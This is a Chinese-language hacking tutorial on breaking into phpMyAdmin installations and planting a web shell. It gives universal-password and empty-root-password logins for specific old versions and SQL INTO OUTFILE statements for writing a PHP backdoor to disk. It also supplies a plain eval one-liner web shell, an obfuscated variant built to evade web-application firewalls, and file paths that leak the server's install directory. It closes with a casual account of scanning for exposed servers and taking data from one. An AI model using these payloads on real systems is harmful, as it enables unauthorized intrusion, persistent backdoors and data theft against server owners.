下面由phpmyadmin教學欄位介紹關於PHPmyadmin漏洞和拿shell,希望對需要的朋友有幫助!
phpmyadmin的漏洞相對來說,還是比較多的,對於新手來說,分享幾個漏洞,深入的處於程式碼審計方面的也可以和我討論
phpmyadmin2.11.3-2.11.4 這兩個版本存在萬能密碼,直接使用'localhost'@'@」為帳號,密碼不用輸入。
phpmyadmin2.11.9.2 這個版本存在空口令。直接root使用者登陸,密碼不用
##找這個的話用自己的寫的腳本,或是搜素引擎什麼的,這裡懂的人就懂了,不懂也不在這裡。
#關於拿shell,----》root權限,並且有寫檔權限----》導出的目錄有寫權限----》有的情況下,就算你這兩個都有,但是伺服器的一些配置還是會對這個有影響。
在getshell之前先進入一個資料庫
第一種,使用sql語句,建立一個表,新增一個字段,字段的內容為一句話,然後匯出到php檔案中,最後刪除這個表,這個是最保險的方法 Create TABLE 表(列text NOT NULL)
Insert INTO 表(列) VALUES('2c94e138b1ef09d65f1021cf56efe9cb')
select 列from 表into _utfile '路徑'
Drop TABLE IF EXISTS 表;
第二種方法,這個是直接寫入 select '一句話'INTO _UTFILE '路徑'
還有幾種方法,大致原理都一樣。
然後,一般的話,一句話都是
<span style="font-size: 16px;"><?php @eval($_POST[x])?><br/></span>
有狗的話,用免殺一句話,下面這個是我過年前構造的過狗一句話,現在應該還可以過
<span style="font-size: 16px;"><?php<br/> $a = 's';<br/> $str = str_repeat($a,2);<br/> $to = $_POST;<br/> //echo $str;<br/> $exp = 'a'.$str[0].$str[1].'e'.'r'.'t';<br/> $exp($to['x'])<br/> ?><br/></span>
找路徑的話,
<span style="font-size: 16px;">1// 利用phpinfo.php<br/> 2//利用phpmyadmin的一些文件报错,下面都是网上通用的<br/> /phpMyAdmin/index.php?lang[]=1<br/> /phpMyAdmin/phpinfo.php<br/> /load_file()<br/> /phpmyadmin/themes/darkblue_orange/layout.inc.php<br/> /phpmyadmin/libraries/select_lang.lib.php<br/> /phpmyadmin/libraries/lect_lang.lib.php<br/> /phpmyadmin/libraries/mcrypt.lib.php<br/> /phpmyadmin/libraries/export/xls.php<br/></span>
3//再者就是利用網站包路徑,這些會的都會了,不會的慢慢的就會了。
下面開始實戰,腳本掃到一個IP,顯示存在phpmyadmin,開啟
這個肯定被人搞了,直接打包好東西,你懂的。 。 。提權什麼的就不必要了。
以上是分析PHPmyadmin漏洞以及拿shell的介紹的詳細內容。更多資訊請關注PHP中文網其他相關文章!